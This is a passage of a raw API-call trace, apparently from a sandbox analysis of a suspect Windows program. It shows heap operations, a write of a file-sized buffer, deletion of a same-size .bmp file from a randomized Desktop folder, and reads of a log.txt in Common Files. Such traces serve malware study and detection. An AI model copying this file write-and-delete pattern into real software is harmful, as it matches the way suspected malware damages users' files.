Size=0x8) returned 0x9c26e8 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0164.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0164.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0164.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0164.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.799] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd930 [0164.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd930, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.800] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.800] WriteFile (in: hFile=0x120, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0xefde, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0xefde, lpOverlapped=0x0) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0164.802] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.802] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.802] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.803] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.803] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.803] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0164.803] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.803] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.805] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.805] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.805] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpFilePart=0x0) returned 0x40 [0164.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0x7a60e60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 0x90af58 [0164.807] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\kq7hl.bmp")) returned 1 [0164.814] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0x7a60e60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 0 [0164.814] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0164.815] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.816] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.816] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.816] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.816] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.816] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.816] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.816] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.817] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.818] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.818] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0164.818] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.818] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0164.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0164.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0164.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.819] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0164.820] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x982, lpOverlapped=0x0) returned 1 [0164.820] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0164.820] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x982, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.820] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0164.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0164.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0164.820] 